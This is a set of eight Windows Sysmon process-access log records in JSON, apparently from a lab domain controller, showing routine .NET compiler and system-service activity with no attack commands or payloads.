{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5661,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.650\r\nSourceProcessGUID: {E2A3D6B1-11D6-5F25-0000-00101A500800}\r\nSourceProcessId: 4968\r\nSourceThreadId: 4928\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nTargetProcessGUID: {E2A3D6B1-11D6-5F25-0000-0010EC530800}\r\nTargetProcessId: 4972\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+b181|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3d58|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3ed0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3fa6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+274e|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+27a0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+28e4|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+7e38f|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+45d22|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+448ef|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+445e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+44303|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+18321|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+17b76|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+9e0d|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+1edf02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.650","SourceProcessGUID":"{E2A3D6B1-11D6-5F25-0000-00101A500800}","SourceProcessId":"4968","SourceThreadId":"4928","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","TargetProcessGUID":"{E2A3D6B1-11D6-5F25-0000-0010EC530800}","TargetProcessId":"4972","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+b181|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3d58|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3ed0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3fa6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+274e|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+27a0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+28e4|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+7e38f|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+45d22|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+448ef|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+445e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+44303|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+18321|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+17b76|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+9e0d|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+1edf02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5662,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.650\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11D6-5F25-0000-0010EC530800}\r\nTargetProcessId: 4972\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.650","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11D6-5F25-0000-0010EC530800}","TargetProcessId":"4972","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5663,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.650\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.650","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5664,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.650\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.650","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5665,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.650\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.650","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5666,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.650\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.650","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5667,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.650\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.650","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5668,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.650\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.650","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
